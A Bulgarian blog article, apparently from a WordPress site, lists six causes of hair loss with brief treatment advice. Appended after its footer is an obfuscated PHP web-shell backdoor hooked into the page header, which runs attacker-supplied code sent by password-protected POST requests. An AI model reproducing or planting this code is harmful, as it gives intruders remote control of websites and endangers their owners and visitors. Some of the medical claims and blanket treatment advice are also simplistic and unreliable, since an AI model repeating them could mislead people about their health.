Как да лекуваме 6- те най- чести причинители на косопад | Косопад

Шест причини за косопад и тяхното лечение

Косопадът е широкоразпространен проблем, който обаче се отразява индивидуално на всеки човек. Падането на косата може да се дължи на различни причини. Съществуват няколко основни групи, в зависимост от причинителя:

Стрес. Има изключително силно въздействие върху състоянието на косата като води до падането й. Обикновено минават 2-3 месеца, докато започне капането й. Причината е, че при стрес, надбъбречните жлези усилват дейността си и това води до завишено производство на тестостерон и норадреналин, които предизвикват косопад. Ако това е вашият случай, идете на лекар, за да ви предпишат витамини и минерали, които да ви помогнат. В по- крайни случай, се налага и психотерапия.kosopad3

Болести на щитовидната жлеза. Причиняват силен косопад. За да се излекувате, трябва да минете на хормонална терапия.

Бременност: По време на бременността тялото отделя естроген повече от обикновено, което прави косата особено красива и здрава. След раждането обаче, нивата му се нормализират и настъпва капане на косата. За да се справите с проблема, трябва да приемате витамин В6, желязо, магнезий и калций.

Климакс. При менопаузата намалява отделянето на женски хормони, а се засилва синтеза на мъжки, които водят до косопад. Освен това, климаксът представлява огромен стрес за жените. Лечението е хормонално.

Преобладаване на мъжки хормони. Когато тялото произвежда повече мъжки хормони, това предизвиква косопад и дори оплешивяване при жените.

Автоагресия. Тялото се отнася към косата като към чуждо тяло. Това предизвиква косопад, като се образуват кръгове. В такъв случай се консултирайте с имунолог.

16. юли 2013 16:59:15 от Надя Колева
Категории: Косопад – Статии | Етикети: , , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}